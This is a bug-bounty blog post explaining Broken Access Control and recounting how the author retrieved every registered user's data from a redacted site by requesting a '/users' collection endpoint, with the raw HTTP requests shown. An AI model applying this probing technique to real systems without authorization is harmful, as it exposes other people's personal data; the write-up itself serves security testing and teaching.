Manikanta S 
A special Bug-Bounty tip for Bug hunters and Pen-testers
If you already know about Broken Access Control weakness. Please skip explanation and go to the “Observation” section.
What is Broken Access Control
Broken Access Control is a type of weakness in the software program or application. If the system gives unauthorized access to a low privileged user then we can say that the system had a Broken Access Control weakness.
Broken access controls are a commonly tends to High/critical security vulnerability. Design and management of access controls is a complex and dynamic problem that applies business, organizational, and legal constraints to a technical implementation.
Access Controls are sub-divided into 2 categories
1. Vertical Access Controls
2. Horizontal Access Controls
Issue Observation:
We will assume that the target host name is REDACTED. The figures during the post just for demonstrations, might not relevant to REDACTED domain.
I found a website and it has the signup feature to register an account. I created two accounts and start exploring the web application features for hunting the access control issues. I analyzed the “My Profile” request and observed the below API endpoint.
GET /v1/account/3/user/{userId} HTTP/1.1
Host: REDACTED.COM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ik1rTkNOME0zTXpjek9VUXhOVE5DUVRrd01VRkJSa1EzT0RNNVFqSTBOREUzUlRreE0wTTRdNUSJ9……..
Origin: REDACTED.COM
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
To verify the access controls I have changed the “userId” value with the another account “userId”. But the application is validating the “userId” value at server side and does not allow to retrieve the other user information. After a while some how I got an idea and tested the request with “/users” resource.
GET /v1/account/3/users HTTP/1.1
Host: REDACTED.COM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ik1rTkNOME0zTXpjek9VUXhOVE5DUVRrd01VRkJSa1EzT0RNNVFqSTBOREUzUlRreE0wTTRdNUSJ9……..
Origin: REDACTED.COM
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Yahoooooo! I got “200 OK” response and able to get all the registered users information in the response.
Thanks for reading. If you like this write-up please do follow me and stay tune for more hacking techniques.
How-to-deploy-a-personal-VPN-in-Linode